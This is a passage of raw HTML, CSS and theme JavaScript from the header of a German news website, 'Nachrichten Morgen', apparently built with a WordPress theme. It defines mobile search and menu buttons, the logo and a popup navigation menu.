  413. <style scoped>.tdi_12{vertical-align:baseline}.tdi_12>.wpb_wrapper,.tdi_12>.wpb_wrapper>.tdc-elements{display:block}.tdi_12>.wpb_wrapper>.tdc-elements{width:100%}.tdi_12>.wpb_wrapper>.vc_row_inner{width:auto}.tdi_12>.wpb_wrapper{width:auto;height:auto}@media (max-width:767px){.tdi_12{width:15%!important;display:inline-block!important}}</style><div class="wpb_wrapper" ><div class="td_block_wrap tdb_mobile_search tdi_13 td-pb-border-top td_block_template_1 tdb-header-align"  data-td-block-uid="tdi_13" >
  414. <style>@media (max-width:767px){.tdi_13{margin-right:-16px!important;margin-bottom:0px!important}}</style>
  415. <style>.tdb_mobile_search{margin-bottom:0;clear:none}.tdb_mobile_search a{display:inline-block!important;position:relative;text-align:center;color:var(--td_theme_color,#4db2ec)}.tdb_mobile_search a>span{display:flex;align-items:center;justify-content:center}.tdb_mobile_search svg{height:auto}.tdb_mobile_search svg,.tdb_mobile_search svg *{fill:var(--td_theme_color,#4db2ec)}#tdc-live-iframe .tdb_mobile_search a{pointer-events:none}.td-search-opened{overflow:hidden}.td-search-opened #td-outer-wrap{position:static}.td-search-opened .td-search-wrap-mob{position:fixed;height:calc(100% + 1px)}.td-search-opened .td-drop-down-search{height:calc(~100% + 1px);overflow-y:scroll;overflow-x:hidden}.tdi_13 .tdb-block-inner{text-align:right}.tdi_13 .tdb-header-search-button-mob i{font-size:22px;width:55px;height:55px;line-height:55px}.tdi_13 .tdb-header-search-button-mob svg{width:22px}.tdi_13 .tdb-header-search-button-mob .tdb-mobile-search-icon-svg{width:55px;height:55px;display:flex;justify-content:center}.tdi_13 .tdb-header-search-button-mob{color:#000000}.tdi_13 .tdb-header-search-button-mob svg,.tdi_13 .tdb-header-search-button-mob svg *{fill:#000000}.tdi_13 .tdb-header-search-button-mob:hover{color:#ec3535}.td-search-wrap-mob .td-module-exclusive .td-module-title a:before{display:inline-block}@media (min-width:1019px) and (max-width:1140px){}@media (min-width:768px) and (max-width:1018px){}@media (max-width:767px){.tdi_13 .tdb-header-search-button-mob i{font-size:23px}.tdi_13 .tdb-header-search-button-mob svg{width:23px}.tdi_13 .tdb-header-search-button-mob i{width:50.6px;height:50.6px;line-height:50.6px}.tdi_13 .tdb-header-search-button-mob .tdb-mobile-search-icon-svg{width:50.6px;height:50.6px;display:flex;justify-content:center}}</style><div class="tdb-block-inner td-fix-index"><span class="tdb-header-search-button-mob dropdown-toggle" data-toggle="dropdown"><span class="tdb-mobile-search-icon tdb-mobile-search-icon-svg" ><svg version="1.1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1024 1024"><path d="M980.152 934.368l-189.747-189.747c60.293-73.196 90.614-163 90.552-252.58 0.061-101.755-38.953-203.848-116.603-281.498-77.629-77.67-179.732-116.664-281.446-116.603-101.765-0.061-203.848 38.932-281.477 116.603-77.65 77.629-116.664 179.743-116.623 281.467-0.041 101.755 38.973 203.848 116.623 281.436 77.629 77.64 179.722 116.654 281.477 116.593 89.569 0.061 179.395-30.249 252.58-90.501l189.737 189.757 54.927-54.927zM256.358 718.519c-62.669-62.659-93.839-144.394-93.86-226.509 0.020-82.094 31.191-163.85 93.86-226.54 62.669-62.638 144.425-93.809 226.55-93.839 82.084 0.031 163.84 31.201 226.509 93.839 62.638 62.659 93.809 144.445 93.829 226.57-0.020 82.094-31.191 163.84-93.829 226.478-62.669 62.628-144.404 93.798-226.509 93.829-82.125-0.020-163.881-31.191-226.55-93.829z"></path></svg></span></span></div></div> <!-- ./block --></div></div></div></div></div></div>                </div>
  416.                
  417.                    <div class="td-header-mobile-sticky-wrap tdc-zone-sticky-invisible tdc-zone-sticky-inactive" style="display: none">
  418.                        <div id="tdi_14" class="tdc-zone"><div class="tdc_zone tdi_15  wpb_row td-pb-row tdc-element-style" data-sticky-offset="0" >
  419. <style scoped>.tdi_15{min-height:0}.tdi_15>.td-element-style:after{content:''!important;width:100%!important;height:100%!important;position:absolute!important;top:0!important;left:0!important;z-index:0!important;display:block!important;background-color:#ffffff!important}.td-header-mobile-sticky-wrap.td-header-active{opacity:1}.td-header-mobile-sticky-wrap{-webkit-transition:all 0.3s ease-in-out;-moz-transition:all 0.3s ease-in-out;-o-transition:all 0.3s ease-in-out;transition:all 0.3s ease-in-out}@media (max-width:767px){.tdi_15:before{content:'';display:block;width:100vw;height:100%;position:absolute;left:50%;transform:translateX(-50%);box-shadow:0px 2px 10px 0px rgba(0,0,0,0.09);z-index:20;pointer-events:none}.td-header-mobile-sticky-wrap{transform:translateY(-120%);-webkit-transform:translateY(-120%);-moz-transform:translateY(-120%);-ms-transform:translateY(-120%);-o-transform:translateY(-120%)}.td-header-mobile-sticky-wrap.td-header-active{transform:translateY(0);-webkit-transform:translateY(0);-moz-transform:translateY(0);-ms-transform:translateY(0);-o-transform:translateY(0)}@media (max-width:767px){.tdi_15:before{width:100%}}}</style>
  420. <div class="tdi_14_rand_style td-element-style" ></div><div id="tdi_16" class="tdc-row"><div class="vc_row tdi_17  wpb_row td-pb-row" >
  421. <style scoped>.tdi_17,.tdi_17 .tdc-columns{min-height:0}#tdi_16.tdc-row[class*='stretch_row']>.td-pb-row>.td-element-style,#tdi_16.tdc-row[class*='stretch_row']>.td-pb-row>.tdc-video-outer-wrapper{width:100%!important}.tdi_17,.tdi_17 .tdc-columns{display:block}.tdi_17 .tdc-columns{width:100%}@media (max-width:767px){.tdi_17,.tdi_17 .tdc-columns{display:flex}.tdi_17 .tdc-columns{width:100%}.tdi_17,.tdi_17 .tdc-columns{flex-direction:row;flex-wrap:nowrap;justify-content:flex-start;align-items:center}@media (min-width:768px){.tdi_17{margin-left:-0px;margin-right:-0px}.tdi_17 .tdc-row-video-background-error,.tdi_17>.vc_column,.tdi_17>.tdc-columns>.vc_column{padding-left:0px;padding-right:0px}}}</style><div class="vc_column tdi_19  wpb_column vc_column_container tdc-column td-pb-span4">
  422. <style scoped>.tdi_19{vertical-align:baseline}.tdi_19>.wpb_wrapper,.tdi_19>.wpb_wrapper>.tdc-elements{display:block}.tdi_19>.wpb_wrapper>.tdc-elements{width:100%}.tdi_19>.wpb_wrapper>.vc_row_inner{width:auto}.tdi_19>.wpb_wrapper{width:auto;height:auto}@media (max-width:767px){.tdi_19{width:15%!important;display:inline-block!important}}</style><div class="wpb_wrapper" ><div class="td_block_wrap tdb_mobile_menu tdi_20 td-pb-border-top td_block_template_1 tdb-header-align"  data-td-block-uid="tdi_20" >
  423. <style>@media (max-width:767px){.tdi_20{margin-left:-12px!important}}</style>
  424. <style>.tdi_20 .tdb-mobile-menu-button i{font-size:22px}.tdi_20 .tdb-mobile-menu-button svg{width:22px}.tdi_20 .tdb-mobile-menu-button i{width:55px;height:55px;line-height:55px}.tdi_20 .tdb-mobile-menu-button .tdb-mobile-menu-icon-svg{width:55px;height:55px}.tdi_20 .tdb-mobile-menu-button{color:#f43f3f}.tdi_20 .tdb-mobile-menu-button svg,.tdi_20 .tdb-mobile-menu-button svg *{fill:#f43f3f}.tdi_20 .tdb-mobile-menu-button:hover{color:#dd3333}.tdi_20 .tdb-mobile-menu-button:hover svg,.tdi_20 .tdb-mobile-menu-button:hover svg *{fill:#dd3333}@media (max-width:767px){.tdi_20 .tdb-mobile-menu-button i{font-size:26px}.tdi_20 .tdb-mobile-menu-button svg{width:26px}.tdi_20 .tdb-mobile-menu-button i{width:49.4px;height:49.4px;line-height:49.4px}.tdi_20 .tdb-mobile-menu-button .tdb-mobile-menu-icon-svg{width:49.4px;height:49.4px}}</style><div class="tdb-block-inner td-fix-index"><span class="tdb-mobile-menu-button"><i class="tdb-mobile-menu-icon td-icon-mobile"></i></span></div></div> <!-- ./block --></div></div><div class="vc_column tdi_22  wpb_column vc_column_container tdc-column td-pb-span4">
  425. <style scoped>.tdi_22{vertical-align:baseline}.tdi_22>.wpb_wrapper,.tdi_22>.wpb_wrapper>.tdc-elements{display:block}.tdi_22>.wpb_wrapper>.tdc-elements{width:100%}.tdi_22>.wpb_wrapper>.vc_row_inner{width:auto}.tdi_22>.wpb_wrapper{width:auto;height:auto}@media (max-width:767px){.tdi_22{width:70%!important;display:inline-block!important}}</style><div class="wpb_wrapper" ><div class="td_block_wrap tdb_header_logo tdi_23 td-pb-border-top td_block_template_1 tdb-header-align"  data-td-block-uid="tdi_23" >
  426. <style>.tdi_23{z-index:0!important}@media (min-width:768px) and (max-width:1018px){.tdi_23{padding-top:10px!important;padding-bottom:10px!important}}@media (max-width:767px){.tdi_23{padding-top:6px!important;padding-bottom:10px!important;padding-left:10px!important}}</style>
  427. <style>.tdi_23 .tdb-logo-a,.tdi_23 h1{flex-direction:row}.tdi_23 .tdb-logo-a,.tdi_23 h1{align-items:flex-start;justify-content:center}.tdi_23 .tdb-logo-svg-wrap{display:block}.tdi_23 .tdb-logo-img-wrap{display:none}.tdi_23 .tdb-logo-text-tagline{margin-top:0;margin-left:0px;color:#000000;font-family:Work Sans!important;font-size:12px!important;line-height:4.6!important;font-style:italic!important;font-weight:500!important;}.tdi_23 .tdb-logo-text-wrap{flex-direction:row;align-items:baseline;align-items:flex-start}.tdi_23 .tdb-logo-icon{top:0px;display:none}.tdi_23 .tdb-logo-text-title{color:#ec3535;font-family:PT Serif!important;font-size:100px!important;line-height:1.2!important;font-style:italic!important;font-weight:700!important;letter-spacing:-5px!important;}@media (min-width:1019px) and (max-width:1140px){.tdi_23 .tdb-logo-img{max-width:260px}.tdi_23 .tdb-logo-text-title{font-size:70px!important;letter-spacing:-3px!important;}.tdi_23 .tdb-logo-text-tagline{line-height:3.2!important;letter-spacing:0.5px!important;}}@media (min-width:768px) and (max-width:1018px){.tdi_23 .tdb-logo-img{max-width:180px}.tdi_23 .tdb-logo-icon{top:3px}.tdi_23 .tdb-logo-text-title{font-size:45px!important;letter-spacing:-2px!important;}.tdi_23 .tdb-logo-text-tagline{font-size:11px!important;line-height:2.5!important;letter-spacing:0px!important;}}@media (max-width:767px){.tdi_23 .tdb-logo-text-title{font-size:28px!important;font-style:normal!important;letter-spacing:-2px!important;}.tdi_23 .tdb-logo-text-tagline{font-size:10px!important;letter-spacing:0px!important;}}</style><div class="tdb-block-inner td-fix-index"><a class="tdb-logo-a" href="https://nachrichtenmorgen.de/"><h1><span class="tdb-logo-text-wrap"><span class="tdb-logo-text-title">Nachrichten Morgen</span><span class="tdb-logo-text-tagline"> </span></span></h1></a></div></div> <!-- ./block --></div></div><div class="vc_column tdi_25  wpb_column vc_column_container tdc-column td-pb-span4">
  428. <style scoped>.tdi_25{vertical-align:baseline}.tdi_25>.wpb_wrapper,.tdi_25>.wpb_wrapper>.tdc-elements{display:block}.tdi_25>.wpb_wrapper>.tdc-elements{width:100%}.tdi_25>.wpb_wrapper>.vc_row_inner{width:auto}.tdi_25>.wpb_wrapper{width:auto;height:auto}@media (max-width:767px){.tdi_25{width:15%!important;display:inline-block!important}}</style><div class="wpb_wrapper" ><div class="td_block_wrap tdb_mobile_search tdi_26 td-pb-border-top td_block_template_1 tdb-header-align"  data-td-block-uid="tdi_26" >
  429. <style>@media (max-width:767px){.tdi_26{margin-right:-14px!important;margin-bottom:0px!important}}</style>
  430. <style>.tdi_26 .tdb-block-inner{text-align:right}.tdi_26 .tdb-header-search-button-mob i{font-size:22px;width:55px;height:55px;line-height:55px}.tdi_26 .tdb-header-search-button-mob svg{width:22px}.tdi_26 .tdb-header-search-button-mob .tdb-mobile-search-icon-svg{width:55px;height:55px;display:flex;justify-content:center}.tdi_26 .tdb-header-search-button-mob{color:#f43f3f}.tdi_26 .tdb-header-search-button-mob svg,.tdi_26 .tdb-header-search-button-mob svg *{fill:#f43f3f}.tdi_26 .tdb-header-search-button-mob:hover{color:#dd3333}.td-search-wrap-mob .td-module-exclusive .td-module-title a:before{display:inline-block}@media (min-width:1019px) and (max-width:1140px){}@media (min-width:768px) and (max-width:1018px){}@media (max-width:767px){.tdi_26 .tdb-header-search-button-mob i{font-size:23px}.tdi_26 .tdb-header-search-button-mob svg{width:23px}.tdi_26 .tdb-header-search-button-mob i{width:50.6px;height:50.6px;line-height:50.6px}.tdi_26 .tdb-header-search-button-mob .tdb-mobile-search-icon-svg{width:50.6px;height:50.6px;display:flex;justify-content:center}}</style><div class="tdb-block-inner td-fix-index"><span class="tdb-header-search-button-mob dropdown-toggle" data-toggle="dropdown"><span class="tdb-mobile-search-icon tdb-mobile-search-icon-svg" ><svg version="1.1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1024 1024"><path d="M980.152 934.368l-189.747-189.747c60.293-73.196 90.614-163 90.552-252.58 0.061-101.755-38.953-203.848-116.603-281.498-77.629-77.67-179.732-116.664-281.446-116.603-101.765-0.061-203.848 38.932-281.477 116.603-77.65 77.629-116.664 179.743-116.623 281.467-0.041 101.755 38.973 203.848 116.623 281.436 77.629 77.64 179.722 116.654 281.477 116.593 89.569 0.061 179.395-30.249 252.58-90.501l189.737 189.757 54.927-54.927zM256.358 718.519c-62.669-62.659-93.839-144.394-93.86-226.509 0.020-82.094 31.191-163.85 93.86-226.54 62.669-62.638 144.425-93.809 226.55-93.839 82.084 0.031 163.84 31.201 226.509 93.839 62.638 62.659 93.809 144.445 93.829 226.57-0.020 82.094-31.191 163.84-93.829 226.478-62.669 62.628-144.404 93.798-226.509 93.829-82.125-0.020-163.881-31.191-226.55-93.829z"></path></svg></span></span></div></div> <!-- ./block --></div></div></div></div></div></div>                    </div>
  431.  
  432.                
  433.                <div class="td-header-desktop-wrap ">
  434.                    <div id="tdi_27" class="tdc-zone"><div class="tdc_zone tdi_28  wpb_row td-pb-row"  >
  435. <style scoped>.tdi_28{min-height:0}.tdi_28:before{content:'';display:block;width:100vw;height:100%;position:absolute;left:50%;transform:translateX(-50%);box-shadow:0px 0px 10px 0px rgba(0,0,0,0.08);z-index:20;pointer-events:none}.td-header-desktop-wrap{position:relative}@media (max-width:767px){.tdi_28:before{width:100%}}</style><div id="tdi_29" class="tdc-row stretch_row_1400 td-stretch-content"><div class="vc_row tdi_30  wpb_row td-pb-row tdc-element-style tdc-row-content-vert-bottom" >
  436. <style scoped>.tdi_30,.tdi_30 .tdc-columns{min-height:0}.tdi_30,.tdi_30 .tdc-columns{display:flex;flex-direction:row;flex-wrap:nowrap;justify-content:flex-start;align-items:center}.tdi_30 .tdc-columns{width:100%}@media (min-width:768px){.tdi_30{margin-left:-10px;margin-right:-10px}.tdi_30 .tdc-row-video-background-error,.tdi_30>.vc_column,.tdi_30>.tdc-columns>.vc_column{padding-left:10px;padding-right:10px}}@media (min-width:767px){.tdi_30.tdc-row-content-vert-center,.tdi_30.tdc-row-content-vert-center .tdc-columns{display:flex;align-items:center;flex:1}.tdi_30.tdc-row-content-vert-bottom,.tdi_30.tdc-row-content-vert-bottom .tdc-columns{display:flex;align-items:flex-end;flex:1}.tdi_30.tdc-row-content-vert-center .td_block_wrap{vertical-align:middle}.tdi_30.tdc-row-content-vert-bottom .td_block_wrap{vertical-align:bottom}}@media (min-width:1019px) and (max-width:1140px){@media (min-width:768px){.tdi_30{margin-left:-5px;margin-right:-5px}.tdi_30 .tdc-row-video-background-error,.tdi_30>.vc_column,.tdi_30>.tdc-columns>.vc_column{padding-left:5px;padding-right:5px}}}@media (min-width:768px) and (max-width:1018px){@media (min-width:768px){.tdi_30{margin-left:-0px;margin-right:-0px}.tdi_30 .tdc-row-video-background-error,.tdi_30>.vc_column,.tdi_30>.tdc-columns>.vc_column{padding-left:0px;padding-right:0px}}}.tdi_30{position:relative}.tdi_30 .td_block_wrap{text-align:left}@media (min-width:768px) and (max-width:1018px){.tdi_30{padding-right:10px!important;padding-left:10px!important}}</style>
  437. <div class="tdi_29_rand_style td-element-style" ><style>.tdi_29_rand_style{background-color:#ffffff!important}</style></div><div class="vc_column tdi_32  wpb_column vc_column_container tdc-column td-pb-span3">
  438. <style scoped>.tdi_32{vertical-align:baseline}.tdi_32>.wpb_wrapper,.tdi_32>.wpb_wrapper>.tdc-elements{display:block}.tdi_32>.wpb_wrapper>.tdc-elements{width:100%}.tdi_32>.wpb_wrapper>.vc_row_inner{width:auto}.tdi_32>.wpb_wrapper{width:auto;height:auto}.tdi_32{width:30%!important}@media (min-width:768px) and (max-width:1018px){.tdi_32{width:33%!important}}</style><div class="wpb_wrapper" ><div class="tdm_block td_block_wrap td_block_wrap tdm_block_popup tdi_33 td-pb-border-top td_block_template_1"  data-td-block-uid="tdi_33" >
  439. <style>.tdi_33{margin-right:20px!important;margin-bottom:0px!important}@media(min-width:1141px){.tdi_33{display:inline-block!important}}@media (min-width:1019px) and (max-width:1140px){.tdi_33{display:inline-block!important}}@media (min-width:768px) and (max-width:1018px){.tdi_33{margin-right:15px!important;display:inline-block!important}}</style>
  440. <style>.tdm-popup-modal-prevent-scroll{overflow:hidden}.tdm-popup-modal-wrap,.tdm-popup-modal-bg{top:0;left:0;width:100%;height:100%}.tdm-popup-modal-wrap{position:fixed;display:flex;z-index:10000}.tdm-popup-modal-bg{position:absolute}.tdm-popup-modal{display:flex;flex-direction:column;position:relative;background-color:#fff;width:700px;max-width:100%;max-height:100%;border-radius:3px;overflow:hidden;z-index:1}.tdm-pm-header{display:flex;align-items:center;width:100%;padding:19px 25px 16px;z-index:10}.tdm-pmh-title{margin:0;padding:0;font-size:18px;line-height:1.2;font-weight:600;color:#1D2327}a.tdm-pmh-title:hover{color:var(--td_theme_color,#4db2ec)}.tdm-pmh-close{position:relative;margin-left:auto;font-size:14px;color:#878d93;cursor:pointer}.tdm-pmh-close *{pointer-events:none}.tdm-pmh-close svg{width:14px;fill:#878d93}.tdm-pmh-close:hover{color:#000}.tdm-pmh-close:hover svg{fill:#000}.tdm-pm-body{flex:1;padding:30px 25px;overflow:auto;overflow-x:hidden}.tdm-pm-body>p:empty{display:none}.tdm-pm-body .tdc-row:not([class*='stretch_row_']),.tdm-pm-body .tdc-row-composer:not([class*='stretch_row_']){width:auto!important;max-width:1240px}.tdm-popup-modal-over-screen,.tdm-popup-modal-over-screen .tdm-pm-body .tdb_header_search .tdb-search-form,.tdm-popup-modal-over-screen .tdm-pm-body .tdb_header_logo .tdb-logo-a,.tdm-popup-modal-over-screen .tdm-pm-body .tdb_header_logo h1{pointer-events:none}.tdm-popup-modal-over-screen .tdm-btn{pointer-events:none!important}.tdm-popup-modal-over-screen .tdm-popup-modal-bg{opacity:0;transition:opacity .2s ease-in}.tdm-popup-modal-over-screen.tdm-popup-modal-open .tdm-popup-modal-bg{opacity:1;transition:opacity .2s ease-out}.tdm-popup-modal-over-screen.tdm-popup-modal-open .tdm-popup-modal,.tdm-popup-modal-over-screen.tdm-popup-modal-open .tdm-pm-body .tdb_header_search .tdb-search-form,.tdm-popup-modal-over-screen.tdm-popup-modal-open .tdm-pm-body .tdb_header_logo .tdb-logo-a,.tdm-popup-modal-over-screen.tdm-popup-modal-open .tdm-pm-body .tdb_header_logo h1{pointer-events:auto}.tdm-popup-modal-over-screen.tdm-popup-modal-open .tdm-btn{pointer-events:auto!important}.tdm-popup-modal:hover .td-admin-edit{display:block;z-index:11}#tdm-popup-modal-td_m_246d{align-items:center;justify-content:center;z-index:10002}#tdm-popup-modal-td_m_246d.tdm-popup-modal-over-screen .tdm-popup-modal{opacity:0;transform:scale(.95);transition:opacity .2s ease-in,transform .2s ease-in}#tdm-popup-modal-td_m_246d.tdm-popup-modal-over-screen.tdm-popup-modal-open .tdm-popup-modal{opacity:1;transform:scale(1);transition:opacity .2s ease-out,transform .2s ease-out}#tdm-popup-modal-td_m_246d .tdm-popup-modal{width:900px;border-radius:0px;box-shadow:0px 3px 16px 0px rgba(0,0,0,0.12)}#tdm-popup-modal-td_m_246d .tdm-pm-header{display:flex;position:absolute;top:0;left:0;pointer-events:none;padding:20px;border-width:0px;border-style:solid;border-color:#EBEBEB}#tdm-popup-modal-td_m_246d .tdm-pmh-close{pointer-events:auto;top:0px;color:#ec3535}#tdm-popup-modal-td_m_246d .tdm-pm-body{padding:24px 0}#tdm-popup-modal-td_m_246d.tdm-popup-modal-open{pointer-events:auto}#tdm-popup-modal-td_m_246d .tdm-popup-modal-bg{background:rgba(0,0,0,0.7)}#tdm-popup-modal-td_m_246d .tdm-pmh-close svg{fill:#ec3535}#tdm-popup-modal-td_m_246d .tdm-pmh-close:hover{color:#c11f1f}#tdm-popup-modal-td_m_246d .tdm-pmh-close:hover svg{fill:#c11f1f}@media (min-width:783px){.admin-bar .tdm-popup-modal-wrap{padding-top:32px}}@media (max-width:782px){.admin-bar .tdm-popup-modal-wrap{padding-top:46px}}@media (min-width:1141px){.tdm-pm-body .tdc-row:not([class*='stretch_row_']),.tdm-pm-body .tdc-row-composer:not([class*='stretch_row_']){padding-left:24px;padding-right:24px}}@media (min-width:1019px) and (max-width:1140px){.tdm-pm-body .tdc-row:not([class*='stretch_row_']),.tdm-pm-body .tdc-row-composer:not([class*='stretch_row_']){padding-left:20px;padding-right:20px}}@media (max-width:767px){.tdm-pm-body .tdc-row:not([class*='stretch_row_']){padding-left:20px;padding-right:20px}}@media (min-width:1019px) and (max-width:1140px){#tdm-popup-modal-td_m_246d .tdm-pm-header{border-width:0px;border-style:solid;border-color:#EBEBEB}}@media (min-width:768px) and (max-width:1018px){#tdm-popup-modal-td_m_246d .tdm-popup-modal{width:720px}#tdm-popup-modal-td_m_246d .tdm-pm-header{padding:15px;border-width:0px;border-style:solid;border-color:#EBEBEB}#tdm-popup-modal-td_m_246d .tdm-pm-body{padding:0px}}@media (max-width:767px){#tdm-popup-modal-td_m_246d .tdm-pm-header{border-width:0px;border-style:solid;border-color:#EBEBEB}}</style><script type="rocketlazyloadscript">var block_tdi_33 = new tdBlock();
  441. block_tdi_33.id = "tdi_33";
  442. block_tdi_33.atts = '{"button_size":"tdm-btn-sm","modal_align":"center-center","overlay_bg":"rgba(0,0,0,0.7)","modal_id":"td_m_246d","page_id":"268","button_tdicon":"td-icon-menu-medium","button_icon_size":"eyJhbGwiOiIxNyIsInBvcnRyYWl0IjoiMTYifQ==","button_padding":"0","modal_transition":"","modal_width":"eyJhbGwiOiI5MDBweCIsInBvcnRyYWl0IjoiNzIwcHgifQ==","modal_border_radius":"0","all_head_border":"0","tds_button":"tds_button5","tds_button5-f_btn_text_font_family":"653","tds_button5-f_btn_text_font_size":"eyJhbGwiOiIxNCIsInBvcnRyYWl0IjoiMTMifQ==","tds_button5-f_btn_text_font_line_height":"3","tds_button5-f_btn_text_font_weight":"600","tds_button5-f_btn_text_font_transform":"uppercase","tds_button5-text_color":"#ec3535","tds_button5-text_hover_color":"#c11f1f","modal_shadow_shadow_size":"16","modal_shadow_shadow_offset_vertical":"3","modal_shadow_shadow_color":"rgba(0,0,0,0.12)","trigg_btn_enable":"yes","tdc_css":"eyJhbGwiOnsibWFyZ2luLXJpZ2h0IjoiMjAiLCJtYXJnaW4tYm90dG9tIjoiMCIsImRpc3BsYXkiOiJpbmxpbmUtYmxvY2sifSwibGFuZHNjYXBlIjp7ImRpc3BsYXkiOiJpbmxpbmUtYmxvY2sifSwibGFuZHNjYXBlX21heF93aWR0aCI6MTE0MCwibGFuZHNjYXBlX21pbl93aWR0aCI6MTAxOSwicG9ydHJhaXQiOnsibWFyZ2luLXJpZ2h0IjoiMTUiLCJkaXNwbGF5IjoiaW5saW5lLWJsb2NrIn0sInBvcnRyYWl0X21heF93aWR0aCI6MTAxOCwicG9ydHJhaXRfbWluX3dpZHRoIjo3Njh9","button_icon_space":"eyJhbGwiOjgsInBvcnRyYWl0IjoiNiJ9","body_padd":"eyJhbGwiOiIyNHB4IDAiLCJwb3J0cmFpdCI6IjAifQ==","header_pos":"over-content","head_padd":"eyJhbGwiOiIyMHB4IiwicG9ydHJhaXQiOiIxNXB4In0=","head_icon_color":"#ec3535","head_icon_color_h":"#c11f1f","button_text":"Speisekarte","content_source":"page","custom_code":"aHR0cHMlM0ElMkYlMkZuYWNocmljaHRlbm1vcmdlbi5kZSUyRg==","show_modal_composer":"yes","block_type":"tdm_block_popup","close_modals":"","separator":"","content_load":"","source_modal_id":"","button_url":"","button_open_in_new_window":"","button_url_rel":"","button_icon_aria":"","button_icon_position":"","icon_align":"0","button_width":"","btn_display":"","btn_float_right":"","btn_align_horiz":"content-horiz-left","ga_event_action":"","ga_event_category":"","ga_event_label":"","fb_pixel_event_name":"","fb_pixel_event_content_name":"","trigg_page_load_enable":"","modal_open_delay":"","modal_close_after":"","modal_prevent_open":"","trigg_cursor_area_enable":"","area_vertical_space":"200","modal_area_prevent_open":"","trigg_scroll_enable":"","scroll_distance":"","modal_scroll_prevent_open":"","open_position":"over-screen","site_scroll":"","modal_space":"","modal_height":"","all_modal_border":"","all_modal_border_style":"solid","show_header":"","head_title":"","head_title_url":"","head_title_url_target":"","head_tdicon":"","head_icon_size":"","head_icon_align":"0","all_head_border_style":"solid","hide_for_user_type":"","logged_plan_id":"","author_plan_id":"","modal_bg":"","all_modal_border_color":"","modal_shadow_shadow_header":"","modal_shadow_shadow_title":"Modal shadow","modal_shadow_shadow_offset_horizontal":"","modal_shadow_shadow_spread":"","head_title_color":"","head_title_url_color":"","head_title_url_color_h":"","head_bg":"","all_head_border_color":"","f_head_font_header":"","f_head_font_title":"Header title text","f_head_font_settings":"","f_head_font_family":"","f_head_font_size":"","f_head_font_line_height":"","f_head_font_style":"","f_head_font_weight":"","f_head_font_transform":"","f_head_font_spacing":"","f_head_":"","body_bg":"","el_class":"","css":"","block_template_id":"","td_column_number":1,"header_color":"","ajax_pagination_infinite_stop":"","offset":"","limit":"5","td_ajax_preloading":"","td_ajax_filter_type":"","td_filter_default_txt":"","td_ajax_filter_ids":"","color_preset":"","ajax_pagination":"","ajax_pagination_next_prev_swipe":"","border_top":"","class":"tdi_33","tdc_css_class":"tdi_33","tdc_css_class_style":"tdi_33_rand_style"}';
  443. block_tdi_33.td_column_number = "1";
  444. block_tdi_33.block_type = "tdm_block_popup";
  445. block_tdi_33.post_count = "5";
  446. block_tdi_33.found_posts = "3784";
  447. block_tdi_33.header_color = "";
  448. block_tdi_33.ajax_pagination_infinite_stop = "";
  449. block_tdi_33.max_num_pages = "757";
  450. tdBlocksArray.push(block_tdi_33);
  451. </script>
  452. <style>body .tdi_34 .tdm-btn-text,body .tdi_34 i{color:#ec3535}body .tdi_34 svg{fill:#ec3535}body .tdi_34 svg *{fill:inherit}body .tdi_34:hover .tdm-btn-text,body .tdi_34:hover i{color:#c11f1f;-webkit-text-fill-color:unset;background:transparent;transition:none}body .tdi_34:hover svg{fill:#c11f1f}body .tdi_34:hover svg *{fill:inherit}.tdi_34 svg{width:17px;height:auto}.tdi_34{padding:0px;height:auto;line-height:1;font-family:Work Sans!important;font-size:14px!important;line-height:3!important;font-weight:600!important;text-transform:uppercase!important;height:auto}.tdi_34 .tdm-btn-icon:last-child{margin-left:8px}@media (min-width:768px) and (max-width:1018px){.tdi_34 svg{width:16px;height:auto}.tdi_34 .tdm-btn-icon:last-child{margin-left:6px}.tdi_34{font-size:13px!important}}</style><div class="tds-button td-fix-index"><a href="#"  title="Speisekarte" class="tds-button5 tdm-btn tdm-btn-sm tdi_34 " ><span class="tdm-btn-text">Speisekarte</span><span class="tdm-btn-icon tdm-btn-icon-svg" ><svg version="1.1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1024 1024"><path d="M945.172 561.724h-866.376c-22.364 0-40.55-18.196-40.55-40.591 0-22.385 18.186-40.581 40.55-40.581h866.365c22.385 0 40.561 18.196 40.561 40.581 0.010 22.395-18.176 40.591-40.55 40.591v0zM945.183 330.403h-866.386c-22.374 0-40.55-18.196-40.55-40.571 0-22.405 18.176-40.612 40.55-40.612h866.376c22.374 0 40.561 18.207 40.561 40.612 0.010 22.364-18.186 40.571-40.55 40.571v0zM945.172 793.066h-866.376c-22.374 0-40.55-18.196-40.55-40.602 0-22.385 18.176-40.581 40.55-40.581h866.365c22.385 0 40.581 18.196 40.581 40.581 0.010 22.395-18.196 40.602-40.571 40.602v0z"></path></svg></span></a></div><div id="tdm-popup-modal-td_m_246d" class="tdm-popup-modal-wrap tdm-popup-modal-over-screen" style="display:none;" ><div class="tdm-popup-modal-bg"></div><div class="tdm-popup-modal td-theme-wrap"><div class="tdm-pm-header"><div class="tdm-pmh-close" ><i class="td-icon-modal-close"></i></div></div><div class="tdm-pm-body"><div id="tdi_35" class="tdc-zone"><div class="tdc_zone tdi_36  wpb_row td-pb-row"  >
  453. <style scoped>.tdi_36{min-height:0}</style><div id="tdi_37" class="tdc-row"><div class="vc_row tdi_38  wpb_row td-pb-row" >
  454. <style scoped>.tdi_38,.tdi_38 .tdc-columns{min-height:0}.tdi_38,.tdi_38 .tdc-columns{display:flex;flex-direction:row;flex-wrap:nowrap;justify-content:flex-start;align-items:center}.tdi_38 .tdc-columns{width:100%}@media (min-width:768px){.tdi_38{margin-left:-50px;margin-right:-50px}.tdi_38 .tdc-row-video-background-error,.tdi_38>.vc_column,.tdi_38>.tdc-columns>.vc_column{padding-left:50px;padding-right:50px}}@media (min-width:1019px) and (max-width:1140px){@media (min-width:768px){.tdi_38{margin-left:-40px;margin-right:-40px}.tdi_38 .tdc-row-video-background-error,.tdi_38>.vc_column,.tdi_38>.tdc-columns>.vc_column{padding-left:40px;padding-right:40px}}}@media (min-width:768px) and (max-width:1018px){@media (min-width:768px){.tdi_38{margin-left:-30px;margin-right:-30px}.tdi_38 .tdc-row-video-background-error,.tdi_38>.vc_column,.tdi_38>.tdc-columns>.vc_column{padding-left:30px;padding-right:30px}}}@media (max-width:767px){.tdi_38,.tdi_38 .tdc-columns{flex-direction:column}.tdi_38,.tdi_38 .tdc-columns{align-items:flex-start}}.tdi_38{margin-right:0px!important;margin-left:0px!important}.tdi_38 .td_block_wrap{text-align:left}</style><div class="vc_column tdi_40  